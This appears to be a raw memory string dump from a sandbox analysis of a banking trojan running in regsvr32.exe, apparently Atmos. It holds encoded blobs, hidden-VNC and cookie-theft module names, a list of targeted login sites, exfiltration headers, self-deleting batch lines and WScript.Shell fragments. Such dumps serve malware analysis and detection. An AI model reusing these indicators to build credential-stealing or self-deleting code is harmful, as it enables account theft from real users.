bLTDVLKQUg0huyqGeRETme3vgtHptbc3HtKLcy0vfPN7ho3GliJnfIlnwhAqPHR5IA154JiYW0oM7LzXCvf1CKxpj1LiIrZnwB6d7Jtt3Q8QKx 0eOeMKVM0ssWxpfLZL071LCj9dr01FLINneXWUENh HrZMrHiIwMc1UdC1vKZBx pQDZ646bysxGLoBQGMRzGdjCDwvbbfEXBUrd/g9Fb8hisLCdrpwEdRSFKUJPqH3u0UM6aNat6SOaQC2KyCuj XpXuVQl42OBunYjp28FYnjJ69lTqmpbMzQlwbndruPKMFUzTs7exQHCtDnZmeknvkCEDf6KSkltgHq1kAC84KUjHejJtsRDuBx0 zeOZ7k1xdwTTZ6D09GDNmaScqIuJBvxivLT94S5LKC6lFbmV89F32bLDuyMgdZst/wMPHcFbzg05tfs7uTHFvQFFuOLpHnHSgPnuNioE97QtBFTp6b9JZbfpd2gx jCYIjC6 c jSeFFiVxYZXbEZZZwc/YdSdKleWp1mhPeQm3JVaKaTXHwATQyKbAA5StQDJ1vp7z0ktMKi6ccOlyToNIZKAtx2K5VhhYNCQuk3aOczite07juFnr4cqEWU3ExokG73gHNySThVIb7F4aSuWLuvjJBJIPKF40P9iC768a11KJFrEnBjefcP2wz/YSZVEB4nyEQ06n3xYDzUt/F2cZ5JjhDq88rEvlE24 rRGht8HZgCa5XNtR51BNuBt3pp2eW78aCwiOEI8VDbn7AruVqkZrQQyYiz6MehXkTK77WrmjXVq5vzgUt4Jzu0pRfZGETR3S5xfz5uV2giiqXE6lYyjuBM0jm2JNf nUn iN35Go8p0Li5fuLrpjddQ1dFuKdDNclSXqPKGbcZU125ad0veW6dcXfvAw/P9kMO8/TKTtnfOw8XBDk2xHFOeyXOK/91hTRYgWLfAdC40pzwnNwRaWu2Aaw/vVSJQ/gFTtm5GDHCSIcKgmANglVtydNm8YkauqtmguErNundREO/6Xo5XpIF3kajshYV/7KjUgwJi9iqoftmRJ94/Tnr70imCuitzO5r81yZ3k1z4U 9Me8weKT69PB2aJTIMhrak6AV 2frGulcO1ju8IPk7W8QOYSGWq cymI4z/Bz5J1hFhMdrMzlFpBMzPF5zagQCDIFZV1HxA/RIEJeOKSZ4Sh1I 9/BXsFpOpr2zx DNvJXmpvgC81f5ca1ECBLO/o23asth4rsaKfBTvd5V ATraypf 5cH1w0H28a4Eb/Ho1gl2smdg5cfdBCyocaFQDyIhrgvO7l5RCcuG3sdDcbJzIvOHqtH8pP0vLIc1VLyyMD3b7vBzGSOxGaKGHNKEu/tR524QME0URfvXsGZU8fGNDZ3DE10bOQXQowrs34DwRQV3hyjTDDars/0rORfN73HxM NtO/9LTyB1neFGw7bd2xFjJ2 3mCbtmCg8m3ZfOK05dJ4zWtSUplLfpExGp NvDcwcq6kkSmvNjPrOG3lzUOkNU5LFwX fTSCdGTCfQ N7KO1iQp/ daGpiDbXS 1MYRI956xhzL6PchxIYyRYVOWPUSHrfgnlyaWcxAMhaj03mV4zdJncZwfgv/Dp1uMJAS0hikYb4RZOGHA7dU9G9T9SKw3OKguTYyrTdA55njE7WjvmI4MENhf2qDHPZ9g1qUSFArRTPUCG7yzx1NnKVcWcY7HkEV0j 9CGlVGrJ1 MiBpVEqzDY0vUeOH275PySs/rqsXNDJpLbNDmE0lbRtaNaOy3a3Tqdhx7Jx0Z84NQ9dllnjga9w XIiFWm5OwD P3yTbjqWPOTitm6HJkdvvvlBcOQSs8xyA9/Dvi/Uq0 rvcAOzBFRMoXpegqOp4ABA3rVGt6ooxDsMypVtyWhxdVWhkVraQr uMTeCoYUzwKWcOAP1AemeqcpTP6gxooeAaaTiEWs1Zs6 iB9 lIvynIWBmiCIJPTRXStMLo0r/dEUj4CiHg45RQB2syBda9JjdY0XGYeCNCLbz1JIZ27UeD6bi2aM/5n3a9MMny52SDEyjfO7Fm/sgwJu9KyKQtZOsuBOAU3iF4mpGB7NSG9y4I1fUVKO/QPr/Ri5wmz Zni3fuAEWTwd03qfK8ywZK0b5lagpTXuDab20 x86fQueLed2rRyaNQHQ4A/K7LlV/wNztP1gOQWKd/XqmkNNTUA3YqcXgA7 fFh0DdaKIz3ux5YYm6WpoR IjvZI0DudKoBDT5vbcg7awPBaPHmiwNi7krMp/wRhFAQ51N3v214gjeaW1j6bMR3lA9SoI3D7f1UnUxeMVlpAi9NPSkr/bs3ww4vgTkH3mWPh6JMWUXZ9/JW9DUb44EbqU sZnH33VZYhTRXvzPbeM33RlQ5PN4a5junE3q9tDwTu/7TzGARQvjLcA OST6QkmSObIMuhwG29jbvnhbVkBoBF87U3y9At2usdlnDTqn4XpLgEzr7y2hW28IwB1IMTp9Lc6bs/CzxMTIhGomY3XuLHQwzR1JP47OS7oEmIqKqem/ZsWC1L6lxU8Ij7UPvlreS4ivFjOEkMFyOaba3a8HZ73Sz64k5kbCOaBgeIe73I3WYHege7t2AgsSmDfb mNbiqCpwT 8n/rYk/wFRgOhtF96FVrvKvvPQztLJTcWvQXDm8uncg auwcf KcNWpM5EsstUrJCnazVk28hDtvnVNw73zsmW6HORlfumWpVIqHmVaZ3GKzvu2/WkM9D76zHfFGxzSTmu/QY3v1nk3Z38ky 4FH5uyR0svcFUUmMICwF5 PubCdBq1XivsKGdcDKqwIagfL65CWPpHVBYhoPyPi/s1qIx5KPp/huaJWUkExnCC33e3S0XEoYM0ZtV6U08/fgJph0RqHyYg02Xf6Y3oM t5bEe2pKglGlExbApVTV6ZLKYKGPfbJuZQbAXCC5y8kZBk8efHtSk1OJqVXdBdu3xPesAqf5c8O5VK3gsoeZaEF0FCxBKj tz9vYZC02eQe6 suEpXVRAPmlwFByKUJyGIItA9 1hCBMuyNl sEz8p2qAH4aRiN3EeO3FcpPLwI3V4H6WVQOH2cR QoDJqfl1MzjOtbYnwZ2z2o j3EoDrkuN/dNQdwGlWXgYp2Ka4Dokjf N0l9jtdDeqcVIT7UnPxNobPutRirxsSJ2ykiPosbCuSmGJ2luJnNB2f544LQeD6Ywu5gBT7NC0CmN0zdiF//uq1mIzekizAnyOUYWpRppij5I9dhei3EuFxJKPvu9NohC121dVsh5GLiNcJ2rv2cLEjUiCN0mWy5nFaDe9yEG6Q4LUEw3h3spbcwkKgq3InOIXH5xyQL9R8ycznUoXgaMzAr/ISItqIw9JINdKxGL1 qjfEem6MYgVVsr/8choKvCW3007EyRqptoTDlADiu91orLcl0PbNb7BwNmfZYMYrAImr/ByyAPFLZO87xv/oBB pPVyNCJs p1FNOzmfv5NFa1bvC4f37nMbd9Udx/OikdZavj1wdDGzMX6oViwK VhwR r12DcYln6G6K0FiXQ7tHi5yP9RVPmiN76S1Vy2nlwA iOB3Pn9dU98LHhqob7bNx2VH7r 236DG4JEQj2rNOyrvDHeBZILrP8gpgQsyXAK/vkBtS6zefT5U985ibWtURWUNfHZ7CKJTgnao30Yvix7ONG9X55dsRcEJsMjn79ri1ggH4W1QbM5WFZMBPGSQDmCo6BJVEA0zw/H8OzA94G/meiuKtFGBET2kEJBXkiJ/Nj45RwF7GioMHDh2nVKeM9RtLi6QkyJY2F5p6JgfdOCy7Vb0zpCLzR/gTcI/SBE9fJEe2RdzbBEkIiIq/e5XXzdy5VE264JbYDhVUzkYqT5m5RvpQ1WaoYNLOogRS9kKjsthNMNbpWOOQIkjLaVTReY/CY S7dhLpEDz0n8gwdM2U/R8nu lECUYqEY2N5p3IRtfbkQ9BtlwlQBIFOblFccd1kks7s/p1tH9FyODzisTiaABwyIHBYjwJzod99fLPtGtDZ7wcJ 1TEaSyCWhxPcVqtsARsxgh8oGIM6Xyf9znVVg1pA4Ls5zfs/DfcZ7hLlvE6nzJh22z/9mdImznshhlPfIfcQ2rF97V9mikNxuGTNrfqHPJZPeBpwxJV5C918ybmhlPrOMKMJJmJKxJaM1i lyVp78eTRLF72u3n y3dEq5vOTbnCXE4gE61szPbjUc0NMmtPxnVrhoOajBwJyk7ozqJbZgxLPzF1gH0DvcrYPeUs/uFzXDlXwa/qB6C08bQDsH50J6UqQV67oX8HY4h28v49y7cUWUYt3Mcy8NznHD4clKGtsQJPldyCkekfi/tch9lmECxVI197U/93trIQrhvZKJtY c/pZlRliwqVhofXEh6c GUXPX1LEmI6YdIyElqCybGJFGlXYOTqNm3O4kuiUxZqPSmKBJ6QWuFIaJzSyZl Jg6uvi9mooC6CdqR Sx/PpLqV5cD7gnw66FcLDxTKXnvGFig9K/EVh cmYE/SWPl4i C2WAtSKZol6vKAbpi0JDfpAwb9eAx60GySErBYDPFQ9hV3OljxOyq9UBEM7OJk5Aot0tIA1CGT/TCL/Vw1eo6OBnKsvR2JwX5jtOhDXdZhbnLwIkjd8RNGb5Or93MOW7B2hKPfdUco6zV0CD GBCjois1LL6loZ33mdpD8QLjmSEjX0/DL iWQ9IThcbkpRV Z7qGXywNr4r4/WCNuOhUdugAlxgkLBloP2ipBDB7QYyEtUGgH0RAmE9n9dAqB6knCSFBq3L6G2EEv4CWMS6DrR8HgXt1rr10mz9JtQ2PQarG7zMxWyQG21w9uyT7EVBX0nir8Em95NT7X8HStIfGYMPIJ7xRUHkdxTx1pjFxzQWOVJcvKa5w5gpA1Xov1wrHpdWD8VCTFAkBfv6EfxUVSGGb OLa MIsuuFY/WMhOOjwsujPMZPJFSW2Y7j2SkgtkTZ1FeXEraT6BPM7U zzi5szN0vXyzFMvIo5Uu3QUtJltqCVCohBgY7/cZ4po1gxL/va0HsYcxv6YwPJJq231t4rXLJ4hEOJTz6mvJMMrKz YdO2V/8UuI/pTD9KAcgsxdDp3oZfJbpfx6IsM7eT4F4LNHw695TSM/EgyiIV581yI4nPHNJfxYJ3aXrKI/3oIfmjG5gTZoe2McS7IyDT73KBBL wXfPBKnSRgaxj K0wDIqHpjJaK27UUZG3flQM8RX4q6hgjJQAqMhZIVJC0Z 7Dqg W9gui9 BPwTi Bqco9TXX1ju293YfVWajIe0 8BnvnmJTS7gXqFAa1mfLcZdM5cNsSj9nMiIS2FHcOHeeP2JHy5f6msa9r8wDpSmetJ1Guhf/C2rJjqA1EiQOJR4KXy2JsQtn7ahmRbDcY G6YukhUP0gjCjRqtEU8rs2S4RcsoHfAdO3UQGzwcST73Hohg6n6bH5Cu4obOlXvg0rdvbOw c6cCdEDHeWh0CwfWaSI/SslwL70DERLEDhjXDKdOxSgGBeryK0W75m2KDjcseqV9wxpZADM2II2XjrMCEMtQk29iUS9b7S2FBU0ncF3XHjttNqI5R2UimjOo57C2ESUqn3wK/uP490uI0 7Knr4OD5qc95H8/8eJz7CuIEx882f9Yd6goaCtChnBv8rzwUeH86vGTG4bmRKOX5H9ztPQHDO3hox1rmLXrgZTotKRmtyAS7MrB0pjZdQxu3vRyEsyLDy2YBQv5/y6ZSlRTI6oOhJO2C4c0pkOfdLrvRwAm2nHagci47ExA5k0xvoqK8mXydCQkOZGRJHon9SYqoVthUvfRwAxWXA6zllWTNb 8W8aXHc8YGcqpAQxuzLvTQZwW8C3/N DKFK3YyXVo54wu/Oo/LtmaZ0OVNKovH4LoOJSyLuqOmF4da2wdbd77pp2r5XYBc ri7Zsv6i makju6nos7WqQ/Fo9hG2tQGHoHz6srqQ7B0L3IKlvePezzzcwvn6qQE4Z5 yiNA wRJjVJSrGVBploFCMCA7VJYsAOUIr3FkxwmWYd K7d4f8ara5D20P2vzQoSY//YOLNyQWbRdcmie/jm8 tkLoO9qkJ Si4Q/rhOb229XRmnZmkv87KPDRLK5P5Kdl 1Gh0f7yRCGMQWlAnzmIzSWl6ufjKsy4OHw Ibg4fapFDoByZKKUxMyFFp1o2SuA/H6O5bu0GRvqoVpCNbSMRqVB7cRO8wM0/emO7ftHvENtuW9oujk85 Jjhu0zrH6iEIVxZm9cojZMHUd2B WJfdOdPhNO710 x2l8hXOaqLDguLjZsgHlYR0M6IxlfJvivhj5MHOTRT1y4uxyTTlYgZFGyMXDgAKB2jXI3Cty0vZUTp5Q9PNpbLSoZGc/zw4/TpKWXyzfAHlkkibwotw2OYzUOgtbggg4jpmlBoT2JOao1ctkr2d3UBmAy8XpvspvnBX/xvpdRL/1QMys=lRCPASX27nuqqN0rPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADD"
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
66006666
66006666
"c:\docume~1\"%CurrentUserName%"\locals~1\temp\tmpf7521b9d\bindata865.exe" path>path inj_ffile>inj_ffile
"c:\docume~1\"%CurrentUserName%"\locals~1\temp\tmpf7521b9d\bindata865.exe" path>path inj_ffile>inj_ffile
regsvr32.exe_3264_rwx_00070000_00047000:
.text
.text
`.data
`.data
.reloc
.reloc
update.exe
update.exe
config.bin
config.bin
%0&!%F
%0&!%F
?)500>(8
?)500>(8
7-52&
7-52&
,%)4.5(";$2
,%)4.5(";$2
:'$!71689/
:'$!71689/
-0=).?,7
-0=).?,7
60/)4:5
60/)4:5
-*?)2
-*?)2
>5;(4-2>)4 }744
>5;(4-2>)4 }744
"?5&"5%3%/
"?5&"5%3%/
398>7="'
398>7="'
;!)5:. =##
;!)5:. =##
Z#%xDVOE
Z#%xDVOE
(00(7> 59
(00(7> 59
$6>59$=1
$6>59$=1
^EXKSQN_^%X Sf
^EXKSQN_^%X Sf
PR_OpenTCPSocket
PR_OpenTCPSocket
%s%s%s
%s%s%s
gdiplus.dll
gdiplus.dll
GdiplusShutdown
GdiplusShutdown
ole32.dll
ole32.dll
gdi32.dll
gdi32.dll
?
?
value=[%s], code=[%s]
value=[%s], code=[%s]
HTTP/1.1
HTTP/1.1
HTTP/1.0
HTTP/1.0
hXXps://
hXXps://
GET /favicon.ico HTTP/1.1
GET /favicon.ico HTTP/1.1
HTTP/1.
HTTP/1.
X-WebKit-CSP
X-WebKit-CSP
hXXp://VVV.google.com/webhp
hXXp://VVV.google.com/webhp
%COMMANDSERVER%
%COMMANDSERVER%
hXXp://127.0.0.1:%u/
hXXp://127.0.0.1:%u/
X-Type: %s
X-Type: %s
_getFirefoxCookie
_getFirefoxCookie
hXXp://
hXXp://
atmos_hvnc.module
atmos_hvnc.module
atmos_ffcookie.module
atmos_ffcookie.module
atmos_video.module
atmos_video.module
userenv.dll
userenv.dll
del "%s"
del "%s"
if exist "%s" goto d
if exist "%s" goto d
del /F "%s"
del /F "%s"
Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1)
Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1)
urlmon.dll
urlmon.dll
cabinet.dll
cabinet.dll
hXXp://xxxxxxxx.com/xxxx/xxxx.php
hXXp://xxxxxxxx.com/xxxx/xxxx.php
%s, u %s %u u:u:u GMT
%s, u %s %u u:u:u GMT
; charset=%s
; charset=%s
HTTP/1.1 %u %s
HTTP/1.1 %u %s
Date: %s
Date: %s
Content-Length: %u
Content-Length: %u
Expires: %s
Expires: %s
Content-Type: %s%s
Content-Type: %s%s
ID: %s
ID: %s
value_%s
value_%s
value_%s_%s
value_%s_%s
%s = "%s";
%s = "%s";
*.facebook.com
*.facebook.com
*.twitter.com
*.twitter.com
*.instagram.com
*.instagram.com
*.booking.com
*.booking.com
*.sharepoint.com
*.sharepoint.com
*.yahoo.com
*.yahoo.com
login.yahoo.com
login.yahoo.com
*.google.com
*.google.com
accounts.google.com
accounts.google.com
192.168.*.*
192.168.*.*
127.0.0.1
127.0.0.1
*/wp-login.php*
*/wp-login.php*
*.xn--p1ai
*.xn--p1ai
Cookie: %s
Cookie: %s
Referer: %s
Referer: %s
Accept: %s
Accept: %s
Accept-Language: %s
Accept-Language: %s
Accept-Encoding: %s
Accept-Encoding: %s
SSSh8
SSSh8
9.tI3
9.tI3
CreatePipe
CreatePipe
GetWindowsDirectoryW
GetWindowsDirectoryW
GetProcessHeap
GetProcessHeap
KERNEL32.dll
KERNEL32.dll
GetKeyboardState
GetKeyboardState
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
ExitWindowsEx
ExitWindowsEx
USER32.dll
USER32.dll
RegCreateKeyW
RegCreateKeyW
RegEnumKeyW
RegEnumKeyW
RegQueryInfoKeyW
RegQueryInfoKeyW
RegCloseKey
RegCloseKey
RegCreateKeyExW
RegCreateKeyExW
RegOpenKeyExW
RegOpenKeyExW
RegEnumKeyExW
RegEnumKeyExW
ADVAPI32.dll
ADVAPI32.dll
UrlUnescapeA
UrlUnescapeA
SHDeleteKeyW
SHDeleteKeyW
PathIsURLW
PathIsURLW
SHLWAPI.dll
SHLWAPI.dll
ShellExecuteW
ShellExecuteW
ShellExecuteExW
ShellExecuteExW
SHELL32.dll
SHELL32.dll
Secur32.dll
Secur32.dll
GDI32.dll
GDI32.dll
WS2_32.dll
WS2_32.dll
PFXImportCertStore
PFXImportCertStore
CertDeleteCertificateFromStore
CertDeleteCertificateFromStore
CertOpenSystemStoreW
CertOpenSystemStoreW
CertCloseStore
CertCloseStore
CertEnumCertificatesInStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
CertDuplicateCertificateContext
PFXExportCertStoreEx
PFXExportCertStoreEx
CRYPT32.dll
CRYPT32.dll
HttpSendRequestExA
HttpSendRequestExA
HttpQueryInfoA
HttpQueryInfoA
HttpSendRequestExW
HttpSendRequestExW
HttpSendRequestW
HttpSendRequestW
HttpOpenRequestA
HttpOpenRequestA
HttpOpenRequestW
HttpOpenRequestW
HttpEndRequestA
HttpEndRequestA
HttpSendRequestA
HttpSendRequestA
HttpEndRequestW
HttpEndRequestW
GetUrlCacheEntryInfoW
GetUrlCacheEntryInfoW
HttpAddRequestHeadersW
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpAddRequestHeadersA
InternetCrackUrlA
InternetCrackUrlA
InternetCrackUrlW
InternetCrackUrlW
WININET.dll
WININET.dll
OLEAUT32.dll
OLEAUT32.dll
NETAPI32.dll
NETAPI32.dll
VERSION.dll
VERSION.dll
NtQueryKey
NtQueryKey
ntdll.dll
ntdll.dll
PSSSSSSh
PSSSSSSh
SSSh4
SSSh4
SUWt^Ht[Ht.Huc
SUWt^Ht[Ht.Huc
2!242:2?2[2
2!242:2?2[2
Chrome
Chrome
Firefox
Firefox
nnspr4.dll
nnspr4.dll
nss3.dll
nss3.dll
chrome.dll
chrome.dll
Process (u minute): %s
Process (u minute): %s
Input: %s
Input: %s
X-TS-Rule-Name: %s
X-TS-Rule-Name: %s
X-TS-Rule-PatternID: %u
X-TS-Rule-PatternID: %u
X-TS-BotID: %s
X-TS-BotID: %s
X-TS-Domain: %s
X-TS-Domain: %s
X-TS-SessionID: %s
X-TS-SessionID: %s
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
X-TS-Header-Cookie: %S
X-TS-Header-Cookie: %S
X-TS-Header-Referer: %S
X-TS-Header-Referer: %S
X-TS-Header-AcceptEncoding: %S
X-TS-Header-AcceptEncoding: %S
X-TS-Header-AcceptLanguage: %S
X-TS-Header-AcceptLanguage: %S
X-TS-Header-UserAgent: %S
X-TS-Header-UserAgent: %S
kernel32.dll
kernel32.dll
Global\XXX
Global\XXX
Company: %s
Company: %s
Product: %s
Product: %s
Version: %s
Version: %s
Software\Microsoft\Windows\CurrentVersion\Uninstall
Software\Microsoft\Windows\CurrentVersion\Uninstall
%u: %s | %s | %s
%u: %s | %s | %s
%sd1%
%sd1%
%sd2%
%sd2%
Name: %s
Name: %s
Path: %s
Path: %s
Hash: %s
Hash: %s
Time: u.u.u
Time: u.u.u
\StringFileInfo\xx\%s
\StringFileInfo\xx\%s
"%s" %s
"%s" %s
/c "%s"
/c "%s"
%sx.%s
%sx.%s
%sx
%sx
SELECT * FROM %s
SELECT * FROM %s
Rapport
Rapport
sXXXX
sXXXX
d*.swf
d*.swf
*.flv
*.flv
*.png
*.png
*.jpg
*.jpg
*.ico
*.ico
*.gif
*.gif
*.css
*.css
%Documents and Settings%\%current user%\Application Data\Uccyemuzput\odobdima.xia
%Documents and Settings%\%current user%\Application Data\Uccyemuzput\odobdima.xia
%Documents and Settings%\%current user%\Application Data\Uccyemuzput
%Documents and Settings%\%current user%\Application Data\Uccyemuzput
odobdima.xia
odobdima.xia
%Documents and Settings%\%current user%\Application Data\Felaytzyymes\zaodxiibaru.ilb
%Documents and Settings%\%current user%\Application Data\Felaytzyymes\zaodxiibaru.ilb
%Documents and Settings%\%current user%\Application Data\Felaytzyymes
%Documents and Settings%\%current user%\Application Data\Felaytzyymes
zaodxiibaru.ilb
zaodxiibaru.ilb
%Documents and Settings%\%current user%\Application Data
%Documents and Settings%\%current user%\Application Data
regsvr32.exe_3264_rwx_000D0000_000C0000:
.idata
.idata
.reloc
.reloc
P.rsrc
P.rsrc
Portions Copyright (c) 1983,99 Borland
Portions Copyright (c) 1983,99 Borland
kernel32.dll
kernel32.dll
Software\Microsoft\Windows NT\CurrentVersion
Software\Microsoft\Windows NT\CurrentVersion
wininet.dll
wininet.dll
user32.dll
user32.dll
ntdll.dll
ntdll.dll
Kernel32.dll
Kernel32.dll
URLMON.DLL
URLMON.DLL
Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
PSAPI.dll
PSAPI.dll
HTTP/1.1
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('video'); for(var i=0;i
try {var els=document.getElementsByTagName('video'); for(var i=0;i
try {jwplayer().play()} catch(e){}
try {jwplayer().play()} catch(e){}
IWebBrowser
IWebBrowser
IWebBrowserApp4
IWebBrowserApp4
IWebBrowser2l
IWebBrowser2l
.length;
.length;
=String.fromCharCode(parseInt(
=String.fromCharCode(parseInt(
.substr(
.substr(
,2),16));
,2),16));
=String.fromCharCode(
=String.fromCharCode(
,1).charCodeAt()^
,1).charCodeAt()^
,1).charCodeAt());
,1).charCodeAt());
.length-1)?
.length-1)?
=new ActiveXObject("WScript.Shell");
=new ActiveXObject("WScript.Shell");
.Environment("Process"))("
.Environment("Process"))("
.Run("
.Run("
=new ActiveXObject("WScript.Shell");
=new ActiveXObject("WScript.Shell");
.RegRead("
.RegRead("
psapi.dll
psapi.dll
HTTP/1.1
HTTP/1.1
\\.\LCD
\\.\LCD
1234567890
1234567890
Shell32.dll
Shell32.dll
\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
0123456789
0123456789
Mozilla
Mozilla
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
.text
.text
`.rdata
`.rdata
@.pdata
@.pdata
KERNEL32.dll
KERNEL32.dll
@.reloc
@.reloc
222.dll
222.dll
GetKeyboardType
GetKeyboardType
advapi32.dll
advapi32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
oleaut32.dll
oleaut32.dll
RegOpenKeyExW
RegOpenKeyExW
RegDeleteKeyW
RegDeleteKeyW
RegCreateKeyW
RegCreateKeyW
RegCreateKeyA
RegCreateKeyA
version.dll
version.dll
SetProcessWindowStation
SetProcessWindowStation
OpenWindowStationA
OpenWindowStationA
EnumChildWindows
EnumChildWindows
HttpSendRequestA
HttpSendRequestA
HttpOpenRequestA
HttpOpenRequestA
FindNextUrlCacheEntryA
FindNextUrlCacheEntryA
FindFirstUrlCacheEntryA
FindFirstUrlCacheEntryA
FindCloseUrlCache
FindCloseUrlCache
DeleteUrlCacheEntry
DeleteUrlCacheEntry
ole32.dll
ole32.dll
wsock32.dll
wsock32.dll
winmm.dll
winmm.dll
atl.dll
atl.dll
wtsapi32.dll
wtsapi32.dll
Wtsapi32.dll
Wtsapi32.dll
PSAPI.DLL
PSAPI.DLL
shell32.dll
shell32.dll
ShellExecuteExW
ShellExecuteExW
NtQueryValueKey
NtQueryValueKey
NtDeleteValueKey
NtDeleteValueKey
NtSetValueKey
NtSetValueKey
urlmon.dll
urlmon.dll
UrlMkSetSessionOption
UrlMkSetSessionOption
4"4,414?4
4"4,414?4
3,313[3`3
3,313[3`3
829
829
=.=3=[=`=
=.=3=[=`=
>!>&>7>
>!>&>7>
7)707;7@7
7)707;7@7
= =$=,=_=
= =$=,=_=
?0'101>1
?0'101>1
: :&: :}:
: :&: :}:
?,?;?@?^?
?,?;?@?^?
8 8$8(8,808
8 8$8(8,808
c2h3PgXWqt2QzTRrb/AnQFC6SRUgWch7j77TVxtWrXEisi5gWjLIKgQWWPjhp0UgEz/kVUGNipnIPLZxi8BxUOwd9J5DQbsosxVqooPcMxy2MFTKpmT8aROKg4jgPL5ULF6ilWRorquC8m0XR dR8hd6QeMVN1z8qMkD1vqxgm4LrkB3rrUobN/saPP2hYsk6VQTT5huKnOMVL5caR5vadBp7OdRzhgDnQIi0zuYfIv v02VfY9J3rrQjqC1 pFYIFt3Gp4UAQmbDJLGUi8hvJ5jIHnHXh6ZdE G2FTkJ3CI2Lj2wf8fOmqGCNuCUBH6Ec7vvAylDcuOVeqr6H9 GqsS1IfkCCllztP/uhBjWjey5V SSDAqDhRCVH uTCvACRGgad bO9wKfoRWb20kkPK8CJRO3Cb3ZBKGOeh51oRkebuOLldMrwBX33FmSkln88u4JdiIX3EOwtJpJ8fNuFb9sVJKqbY0xHN8Kq1Or8RhXvuFhn9jvExwsg77Nm9pukUDgOKXK2YjwzI43i2jlgqjXRjPGNPPw8yrBpOYbuqtlz4xPvXSChtWkqlonwCNmHPfYIqUJsozXDoUSntJjEjPKcnSYnNd4VI/OTKRZl4s3QZK4AiriXs m2G8zO3JfYHA4Mzloj7x/ZrAhvhzeMKq4FLKRhJG4T2JXyLgwvQjwXdohUQg4iEYHpcny L36V4uUkFcvU1tvpqDtiOQYa70HHcPEJfYLV8Toym38KdYL9IJPqUdop utIX7HhaldlXLQIAz7PWZnlHKctlhe5qmCRh7GYrijRosE0KLIyPrqsKKjC7bEFYXy01KABfO qe1pH4Q6vjT2LIWDeAU0QF7cNTSc9IrXxuiKrH9fzzDBmL0r2uP90MTpzx4Q6QXF6LFGMM4bSQRJvDy82dHpceQb5 wSJiwXfI1q0lw2j7yeKKU4d1S2yu1KSDqXTy9EIbNA OTz83nYnlm92yC4Q C1WaY TFWNwLLReTWs1XYS 5ycpe2nbJMnH2nWskkuEycGRyOKeWv9mBEriqVlrPdTjCXGsosq0/ze 